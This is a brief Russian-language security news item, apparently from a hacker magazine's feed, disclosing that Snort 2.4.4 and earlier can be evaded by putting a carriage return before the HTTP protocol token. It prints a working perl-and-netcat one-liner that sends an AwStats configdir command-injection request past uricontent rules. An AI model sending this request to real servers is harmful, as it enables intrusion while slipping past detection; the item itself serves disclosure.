Обход правил в Snort

Программа: Snort 2.4.4 и предыдущие версии

Удаленный пользователь может обойти
правила. Нападающий может послать
специально созданный URL с переводом каретки
перед определением HTTP протокола для обхода
правил uricontent.

Например, для того, что бы не было замечена
уязвимость AwStats Vulnerability надо сделать так:

$ perl -e'print "GET /awstats.pl?configdir= |backdoor\r http/1.0\r\n\r\n"'|nc
vulnerable.server 80

Анатолий Ализар: Бывший автор новостной ленты «Хакера». Увлекается современными технологиями, оружием, информационной безопасностью, носимой электроникой и в целом концепцией Internet of Things.